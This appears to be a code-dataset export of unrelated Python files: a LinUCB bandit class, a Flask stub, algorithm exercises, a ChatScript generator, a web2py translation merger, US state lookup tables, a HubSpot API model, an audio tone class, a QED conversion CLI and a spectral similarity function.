reg_factor=1.0,
delta=0.01,
bound_theta=1.0,
confidence_scaling_factor=0.0,
save_path=None,
load_from=None,
guide_for=0,
):
self.iteration = 0
self.save_path = save_path
if load_from is None:
# range of the linear predictors
self.bound_theta = bound_theta
# maximum L2 norm for the features across all arms and all rounds
self.bound_features = np.max(np.linalg.norm(bandit.features, ord=2, axis=-1))
super().__init__(bandit,
reg_factor=reg_factor,
confidence_scaling_factor=confidence_scaling_factor,
delta=delta,
mock_reset=False,
guide_for=guide_for
)
else:
state_dict = self.load(load_from)
self.bound_theta = state_dict['bound_theta']
self.bound_features = np.max(np.linalg.norm(bandit.features, ord=2, axis=-1))
super().__init__(bandit,
reg_factor=reg_factor,
confidence_scaling_factor=confidence_scaling_factor,
delta=delta,
mock_reset=True,
)
self.reg_factor = state_dict['reg_factor']
self.delta = state_dict['delta']
self.bound_theta = state_dict['bound_theta']
self.confidence_scaling_factor = state_dict['confidence_scaling_factor']
self.A_inv = state_dict['A_inv']
self.theta = state_dict['theta']
self.b = state_dict['b']
self.iteration = state_dict['iteration']
def save(self, postfix=''):
if self.save_path is None:
print("Save path is empty...saving here\n")
self.save_path = './'
state_dict = {
'reg_factor': self.reg_factor,
'delta': self.delta,
'bound_theta': self.bound_theta,
'confidence_scaling_factor': self.confidence_scaling_factor,
'A_inv': self.A_inv,
'theta': self.theta,
'b': self.b,
'iteration': self.iteration,
}
with open(self.save_path + f'/linucb_model_{postfix}.pt', 'wb') as f:
pickle.dump(state_dict, f)
if os.path.exists(self.save_path + f'/linucb_model_{postfix}.pt'):
print("Model Saved Succesfully!")
return
def load(self, path):
with open(path, 'rb') as f:
state_dict = pickle.load(f)
return state_dict
@property
def approximator_dim(self):
"""Number of parameters used in the approximator.
"""
return self.bandit.n_features
def update_output_gradient(self):
"""For linear approximators, simply returns the features.
Gradient for each arm here is the same. = Input
"""
self.grad_approx = self.bandit.features[self.iteration % self.bandit.T]
def evaluate_output_gradient(self, features):
"""For linear approximators, simply returns the features.
"""
self.grad_approx = features[0]
def reset(self):
"""Return the internal estimates.
Initialize SINGLE PREDICTOR AND SINGLE B.
REMEMBER TO USE ONLY THE FIRST A_INV
"""
self.reset_upper_confidence_bounds()
self.reset_actions()
self.reset_grad_approx()
if not self.mock_reset:
self.reset_A_inv()
self.theta = np.random.uniform(-1, 1, self.bandit.n_features) * self.bound_theta
self.b = np.zeros(self.bandit.n_features)
@property
def confidence_multiplier(self):
"""Confidence interval multiplier.
"""
return calc_confidence_multiplier(self.confidence_scaling_factor, self.approximator_dim, self.iteration,
self.bound_features, self.reg_factor, self.delta)
def predict(self):
"""Predict reward.
"""
self.mu_hat = np.array(
[
np.dot(self.bandit.features[self.iteration % self.bandit.T, a], self.theta.T) for a in self.bandit.arms
]
)
def train(self):
"""Update linear predictor theta.
"""
self.b += self.bandit.features[self.iteration % self.bandit.T, self.action] * self.bandit.rewards[
self.iteration % self.bandit.T, self.action]
self.theta = np.matmul(self.A_inv, self.b)
def evaluate(self, features):
self.mu_hat = np.array(
[
np.dot(features[0, a], self.theta.T) for a in self.bandit.arms
]
)
|
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
import airbnbapi.resources
|
from .descriptors import (
number_of_rotatable_bonds,
number_of_rotatable_bonds_target_clipped,
)
|
import math
class Solution(object):
def getPermutation(self, n, k):
ans = ''
fact = [1] * n
num = [str(i) for i in range(1, 10)]
for i in range(1, n):
fact[i] = fact[i - 1] * i
k -= 1
for i in range(n, 0, -1):
first = k // fact[i - 1]
k %= fact[i - 1]
ans += num[first]
num.pop(first)
return ans
n = 3
k = 3
res = Solution().getPermutation(n, k)
print(res) |
# -*- coding: utf-8 -*-
import os
import glob
import models
import preprocessing
import wordembedding
import postprocessing
import generalize_rules
def load_file(path):
"""Loads file and return its content as list.
Args:
path: Path to file.
Returns:
list: Content splited by linebreak.
"""
with open(path, 'r') as arq:
text = arq.read().split('\n')
return text
def load_questions(path, lower=True):
"""Loads the questions file and return a tuple containing
a list of questions titles and list of tuples containing questions
and answers.
Args:
path: Path to questions file.
Returns:
List: List of tuples containg titles, questions and answers.
"""
questions = list()
input_lines = load_file(path)
for line in input_lines[1:]:
line_parts = line.split(',')
title = line_parts[0]
answer = ','.join(line_parts[2:])
question = line_parts[1].lower() if lower else line_parts[1]
questions.append((title, question, answer))
return input_lines[0], questions
def preprocess_questions(qnas, ctx_entities):
"""Preprocess all the questions.
Args:
qnas (tuple): Tuple with question and answer.
ctx_entities (list): List of context entities.
Yield:
tuple: Tuple containing preprocessed question and answer.
"""
for (question, answer) in qnas:
pp_question = preprocessing.preprocess(question, ctx_entities)
yield pp_question, answer
def generate_rules(qnas, ctx_entities, embedding_model):
"""Generate the rules according to ChatScript sintax.
Args:
qnas (list): List of tuple with title, question and answer.
ctx_entities (list): Context entities.
Yield:
str: Rule according to ChatScript sintax.
"""
rules = list()
for rule_id, (title, question, answer) in enumerate(qnas):
rule = models.Rule(
rule_id,
title,
question,
answer,
ctx_entities,
embedding_model
)
rules.append(rule)
return rules
def generate_topic_menu(topics):
names = list()
rejoinders = list()
for topic in topics:
if topic.beauty_name:
names.append(topic.beauty_name)
options = list()
options_rule = list()
for rule in topic.rules:
if rule.title:
options.append(rule.title)
output = '^reuse(~{}.{})'.format(topic.name, rule.label)
options_rule.append(
'\n\t\t\t\tb: ({pattern}) {output}'.format(
pattern=rule.title, output=output
)
)
# Join options
options = '\n\t\t\t- '.join(options)
options_text = ('\n\t\t\tSaber sobre:\n\t\t\t- {}').format(options)
options_rule = ''.join(options_rule)
rej = 'a: ({pattern}){options_text}{options_rule}'.format(
pattern=topic.beauty_name.lower(),
options_text=options_text,
options_rule=options_rule,
)
rejoinders.append(rej)
topics_names = '- {}'.format('\n\t- '.join(names))
class TopicMenu(object):
name = None
head = None
rejoinders = None
def __init__(self, head, rejoinders):
self.name = 'menu'
self.head = head
self.rejoinders = rejoinders
def __str__(self):
topic_text = (
'topic: ~menu keep repeat ()\n'
'u: () Posso lhe dar informaçõe sobre:'
'\n\t{head}\n\t- Falar com um atendente -'
'\n\t\t{rejoinders}\n\t\ta: (<<falar atendente>>)'
'\n\t\t\t^pick(~all_right), ^pick(~tranfeer).'
).format(
head=self.head, rejoinders=self.rejoinders
)
return topic_text
menu = TopicMenu(topics_names, '\n\t\t'.join(rejoinders))
return menu
def generate(
ctx_entities_path='input/ctx_entities.txt'
):
"""Generate ChatScript files"""
input_files = list()
dirname = os.path.dirname(os.path.abspath(__file__))
dirname = os.path.join(dirname, 'input')
input_files = glob.glob('{}*.csv'.format(dirname+os.sep))
generetad_topics = list()
cbow = wordembedding.CBoW()
ctx_entities = load_file(ctx_entities_path)
for questions_path in input_files:
beaty_topic_name, questions = load_questions(questions_path)
rules = generate_rules(questions, ctx_entities, cbow)
sorted_rules = generalize_rules.sort_by_entities(rules, cbow)
top_name = questions_path.split(os.sep)[-1].split('.')[0]
topic = models.Topic(top_name, rules, beauty_name=beaty_topic_name)
gen_rules = generalize_rules.generalize(topic, wordembedding)
gen_topic = models.Topic(top_name+'_gen', gen_rules)
topic.rules.extend(sorted_rules)
generetad_topics.append(topic)
generetad_topics.append(gen_topic)
menu = generate_topic_menu(generetad_topics)
generetad_topics.append(menu)
postprocessing.save_chatbot_files('Botin', generetad_topics)
if __name__ == '__main__':
generate()
|
class Codec:
def encode(self, strs):
"""Encodes a list of strings to a single string.
:type strs: List[str]
:rtype: str
"""
res = ""
for i in range(len(strs)):
for j in range(len(strs[i])):
if strs[i][j] == '|':
res += '||'
else:
res += strs[i][j]
res += '|+'
return res
def decode(self, s):
"""Decodes a single string to a list of strings.
:type s: str
:rtype: List[str]
"""
res = []
word = ''
i = 0
while (i < len(s)):
if s[i] == '|':
if s[i + 1] == '+':
res.append(word)
word = ''
else:
word += s[i + 1]
i += 1
else:
word += s[i]
i += 1
return res
# Your Codec object will be instantiated and called as such:
# codec = Codec()
# codec.decode(codec.encode(strs)) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# TODO: Comment this code
import sys
import shutil
import os
from gluon.languages import findT
sys.path.insert(0, '.')
file = sys.argv[1]
apps = sys.argv[2:]
d = {}
for app in apps:
path = 'applications/%s/' % app
findT(path, file)
data = eval(open(os.path.join(path, 'languages', '%s.py' % file)).read())
d.update(data)
path = 'applications/%s/' % apps[-1]
file1 = os.path.join(path, 'languages', '%s.py' % file)
f = open(file1, 'w')
f.write('{\n')
keys = d.keys()
keys.sort()
for key in keys:
f.write('%s:%s,\n' % (repr(key), repr(str(d[key]))))
f.write('}\n')
f.close()
oapps = reversed(apps[:-1])
for app in oapps:
path2 = 'applications/%s/' % app
file2 = os.path.join(path2, 'languages', '%s.py' % file)
shutil.copyfile(file1, file2)
|
StateAbbreviations = [
'al',
'ak',
'az',
'ar',
'ca',
'co',
'ct',
'de',
'fl',
'ga',
'hi',
'id',
'il',
'in',
'ia',
'ks',
'ky',
'la',
'me',
'md',
'ma',
'mi',
'mn',
'ms',
'mo',
'mt',
'ne',
'nv',
'nh',
'nj',
'nm',
'ny',
'nc',
'nd',
'oh',
'ok',
'or',
'pa',
'ri',
'sc',
'sd',
'tn',
'tx',
'ut',
'vt',
'va',
'wa',
'wv',
'wi',
'wy']
StateNameToAbbreviation = {
'ALABAMA': 'AL',
'ALASKA': 'AK',
'ARIZONA': 'AZ',
'ARKANSAS': 'AR',
'CALIFORNIA': 'CA',
'COLORADO': 'CO',
'CONNECTICUT': 'CT',
'DELAWARE': 'DE',
'FLORIDA': 'FL',
'GEORGIA': 'GA',
'HAWAII': 'HI',
'IDAHO': 'ID',
'ILLINOIS': 'IL',
'INDIANA': 'IN',
'IOWA': 'IA',
'KANSAS': 'KS',
'KENTUCKY': 'KY',
'LOUISIANA': 'LA',
'MAINE': 'ME',
'MARYLAND': 'MD',
'MASSACHUSETTS': 'MA',
'MICHIGAN': 'MI',
'MINNESOTA': 'MN',
'MISSISSIPPI': 'MS',
'MISSOURI': 'MO',
'MONTANA': 'MT',
'NEBRASKA': 'NE',
'NEVADA': 'NV',
'NEW HAMPSHIRE': 'NH',
'NEW JERSEY': 'NJ',
'NEW MEXICO': 'NM',
'NEW YORK': 'NY',
'NORTH CAROLINA': 'NC',
'NORTH DAKOTA': 'ND',
'OHIO': 'OH',
'OKLAHOMA': 'OK',
'OREGON': 'OR',
'PENNSYLVANIA': 'PA',
'RHODE ISLAND': 'RI',
'SOUTH CAROLINA': 'SC',
'SOUTH DAKOTA': 'SD',
'TENNESSEE': 'TN',
'TEXAS': 'TX',
'UTAH': 'UT',
'VERMONT': 'VT',
'VIRGINIA': 'VA',
'WASHINGTON': 'WA',
'WEST VIRGINIA': 'WV',
'WISCONSIN': 'WI',
'WYOMING': 'WY',
}
StateAbbreviationToName = {
'AL': 'Alabama',
'AK': 'Alaska',
'AZ': 'Arizona',
'AR': 'Arkansas',
'CA': 'California',
'CO': 'Colorado',
'CT': 'Connecticut',
'DE': 'Delaware',
'FL': 'Florida',
'GA': 'Georgia',
'HI': 'Hawaii',
'ID': 'Idaho',
'IL': 'Illinois',
'IN': 'Indiana',
'IA': 'Iowa',
'KS': 'Kansas',
'KY': 'Kentucky',
'LA': 'Louisiana',
'ME': 'Maine',
'MD': 'Maryland',
'MA': 'Massachusetts',
'MI': 'Michigan',
'MN': 'Minnesota',
'MS': 'Mississippi',
'MO': 'Missouri',
'MT': 'Montana',
'NE': 'Nebraska',
'NV': 'Nevada',
'NH': 'New Hampshire',
'NJ': 'New Jersey',
'NM': 'New Mexico',
'NY': 'New York',
'NC': 'North Carolina',
'ND': 'North Dakota',
'OH': 'Ohio',
'OK': 'Oklahoma',
'OR': 'Oregon',
'PA': 'Pennsylvania',
'RI': 'Rhode Island',
'SC': 'South Carolina',
'SD': 'South Dakota',
'TN': 'Tennessee',
'TX': 'Texas',
'UT': 'Utah',
'VT': 'Vermont',
'VA': 'Virginia',
'WA': 'Washington',
'WV': 'West Virginia',
'WI': 'Wisconsin',
'WY': 'Wyoming',
}
|
# coding: utf-8
"""
Accounting Extension
These APIs allow you to interact with HubSpot's Accounting Extension. It allows you to: * Specify the URLs that HubSpot will use when making webhook requests to your external accounting system. * Respond to webhook calls made to your external accounting system by HubSpot # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.crm.extensions.accounting.configuration import Configuration
class InvoiceCreatePaymentRequest(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
"amount_paid": "float",
"currency_code": "str",
"payment_date_time": "datetime",
"external_payment_id": "str",
}
attribute_map = {
"amount_paid": "amountPaid",
"currency_code": "currencyCode",
"payment_date_time": "paymentDateTime",
"external_payment_id": "externalPaymentId",
}
def __init__(
self,
amount_paid=None,
currency_code=None,
payment_date_time=None,
external_payment_id=None,
local_vars_configuration=None,
): # noqa: E501
"""InvoiceCreatePaymentRequest - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._amount_paid = None
self._currency_code = None
self._payment_date_time = None
self._external_payment_id = None
self.discriminator = None
self.amount_paid = amount_paid
self.currency_code = currency_code
self.payment_date_time = payment_date_time
self.external_payment_id = external_payment_id
@property
def amount_paid(self):
"""Gets the amount_paid of this InvoiceCreatePaymentRequest. # noqa: E501
The amount that this payment is for. # noqa: E501
:return: The amount_paid of this InvoiceCreatePaymentRequest. # noqa: E501
:rtype: float
"""
return self._amount_paid
@amount_paid.setter
def amount_paid(self, amount_paid):
"""Sets the amount_paid of this InvoiceCreatePaymentRequest.
The amount that this payment is for. # noqa: E501
:param amount_paid: The amount_paid of this InvoiceCreatePaymentRequest. # noqa: E501
:type: float
"""
if (
self.local_vars_configuration.client_side_validation and amount_paid is None
): # noqa: E501
raise ValueError(
"Invalid value for `amount_paid`, must not be `None`"
) # noqa: E501
self._amount_paid = amount_paid
@property
def currency_code(self):
"""Gets the currency_code of this InvoiceCreatePaymentRequest. # noqa: E501
The ISO 4217 currency code that represents the currency of the payment. # noqa: E501
:return: The currency_code of this InvoiceCreatePaymentRequest. # noqa: E501
:rtype: str
"""
return self._currency_code
@currency_code.setter
def currency_code(self, currency_code):
"""Sets the currency_code of this InvoiceCreatePaymentRequest.
The ISO 4217 currency code that represents the currency of the payment. # noqa: E501
:param currency_code: The currency_code of this InvoiceCreatePaymentRequest. # noqa: E501
:type: str
"""
if (
self.local_vars_configuration.client_side_validation
and currency_code is None
): # noqa: E501
raise ValueError(
"Invalid value for `currency_code`, must not be `None`"
) # noqa: E501
self._currency_code = currency_code
@property
def payment_date_time(self):
"""Gets the payment_date_time of this InvoiceCreatePaymentRequest. # noqa: E501
The datetime that this payment was received. # noqa: E501
:return: The payment_date_time of this InvoiceCreatePaymentRequest. # noqa: E501
:rtype: datetime
"""
return self._payment_date_time
@payment_date_time.setter
def payment_date_time(self, payment_date_time):
"""Sets the payment_date_time of this InvoiceCreatePaymentRequest.
The datetime that this payment was received. # noqa: E501
:param payment_date_time: The payment_date_time of this InvoiceCreatePaymentRequest. # noqa: E501
:type: datetime
"""
if (
self.local_vars_configuration.client_side_validation
and payment_date_time is None
): # noqa: E501
raise ValueError(
"Invalid value for `payment_date_time`, must not be `None`"
) # noqa: E501
self._payment_date_time = payment_date_time
@property
def external_payment_id(self):
"""Gets the external_payment_id of this InvoiceCreatePaymentRequest. # noqa: E501
The id of this payment in the external accounting system. # noqa: E501
:return: The external_payment_id of this InvoiceCreatePaymentRequest. # noqa: E501
:rtype: str
"""
return self._external_payment_id
@external_payment_id.setter
def external_payment_id(self, external_payment_id):
"""Sets the external_payment_id of this InvoiceCreatePaymentRequest.
The id of this payment in the external accounting system. # noqa: E501
:param external_payment_id: The external_payment_id of this InvoiceCreatePaymentRequest. # noqa: E501
:type: str
"""
if (
self.local_vars_configuration.client_side_validation
and external_payment_id is None
): # noqa: E501
raise ValueError(
"Invalid value for `external_payment_id`, must not be `None`"
) # noqa: E501
self._external_payment_id = external_payment_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InvoiceCreatePaymentRequest):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, InvoiceCreatePaymentRequest):
return True
return self.to_dict() != other.to_dict()
|
class Tone:
def __init__(self, frequency):
self._frequency = abs(frequency) # Hertz (Hz)
@property
def frequency(self):
return self._frequency |
# coding: utf-8
from __future__ import absolute_import
from pyblaze.base import BlazeError
from pyblaze.qed import sparse2qed_fp32, sparse2qed_fp16
import numpy as np
import logging
import sys, getopt
def print_help():
print 'build_qed -p <path> -i <infile> -o <ofile> -s <precision> -t <threadnum>'
print ''
print ' precision option: 0 -> fp32 1 -> fp16'
if __name__ == '__main__':
try:
opts, args = getopt.getopt(sys.argv[1:],"hi:o:t:s:p:",
["ifile=", "ofile=", "threadnum=", "precision=", "path="])
except getopt.GetoptError:
print_help()
sys.exit(2)
path = ''
i_file = ''
o_file = ''
precision = 1 # fp16
thread_num = 1
for opt, arg in opts:
if opt == '-h':
print_help()
sys.exit()
elif opt in ("-p", "--path"):
path = arg
elif opt in ("-i", "--ifile"):
i_file = arg
elif opt in ("-o", "--ofile"):
o_file = arg
elif opt in ("-s", "--precision"):
precision = int(arg)
elif opt in ("-t", "--threadnum"):
thread_num = int(arg)
if precision == 1:
sparse2qed_fp16(path, i_file, o_file, thread_num)
elif precision == 0:
sparse2qed_fp32(path, i_file, o_file, thread_num)
else:
print 'unkown presicion:', precision
sys.exit(1)
|
# -*- coding: utf-8 -*-
"""
Academy Spectral Similarity Index (SSI)
=======================================
Defines the *Academy Spectral Similarity Index* (SSI) computation objects:
- :func:`colour.spectral_similarity_index`
References
----------
- :cite:`TheAcademyofMotionPictureArtsandSciences2019` : The Academy of
Motion Picture Arts and Sciences. (2019). Academy Spectral Similarity Index
(SSI): Overview (pp. 1-7).
"""
from __future__ import division, unicode_literals
import numpy as np
from scipy.ndimage.filters import convolve1d
from colour.algebra import LinearInterpolator
from colour.colorimetry import SpectralShape
from colour.utilities import zeros
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['SSI_SPECTRAL_SHAPE', 'spectral_similarity_index']
SSI_SPECTRAL_SHAPE = SpectralShape(375, 675, 1)
"""
*Academy Spectral Similarity Index* (SSI) spectral shape.
SSI_SPECTRAL_SHAPE : SpectralShape
"""
_SSI_LARGE_SPECTRAL_SHAPE = SpectralShape(380, 670, 10)
_INTEGRATION_MATRIX = None
def spectral_similarity_index(sd_test, sd_reference):
"""
Returns the *Academy Spectral Similarity Index* (SSI) of given test
spectral distribution with given reference spectral distribution.
Parameters
----------
sd_test : SpectralDistribution
Test spectral distribution.
sd_reference : SpectralDistribution
Reference spectral distribution.
Returns
-------
numeric
*Academy Spectral Similarity Index* (SSI).
References
----------
:cite:`TheAcademyofMotionPictureArtsandSciences2019`
Examples
--------
>>> from colour import ILLUMINANT_SDS
>>> sd_test = ILLUMINANT_SDS['C']
>>> sd_reference = ILLUMINANT_SDS['D65']
>>> spectral_similarity_index(sd_test, sd_reference)
94.0
"""
global _INTEGRATION_MATRIX
if _INTEGRATION_MATRIX is None:
_INTEGRATION_MATRIX = zeros([
len(_SSI_LARGE_SPECTRAL_SHAPE.range()),
len(SSI_SPECTRAL_SHAPE.range())
])
weights = np.array([0.5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0.5])
for i in range(_INTEGRATION_MATRIX.shape[0]):
_INTEGRATION_MATRIX[i, (10 * i):(10 * i + 11)] = weights
settings = {
'interpolator': LinearInterpolator,
'extrapolator_kwargs': {
'left': 0,
'right': 0
}
}
sd_test = sd_test.copy().align(SSI_SPECTRAL_SHAPE, **settings)
sd_reference = sd_reference.copy().align(SSI_SPECTRAL_SHAPE, **settings)
test_i = np.dot(_INTEGRATION_MATRIX, sd_test.values)
reference_i = np.dot(_INTEGRATION_MATRIX, sd_reference.values)
test_i /= np.sum(test_i)
reference_i /= np.sum(reference_i)
d_i = test_i - reference_i
dr_i = d_i / (reference_i + np.mean(reference_i))
wdr_i = dr_i * [
12 / 45, 22 / 45, 32 / 45, 40 / 45, 44 / 45, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 11 / 15, 3 / 15
]
c_wdr_i = convolve1d(np.hstack([0, wdr_i, 0]), [0.22, 0.56, 0.22])
m_v = np.sum(c_wdr_i ** 2)
SSI = np.around(100 - 32 * np.sqrt(m_v))
return SSI
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.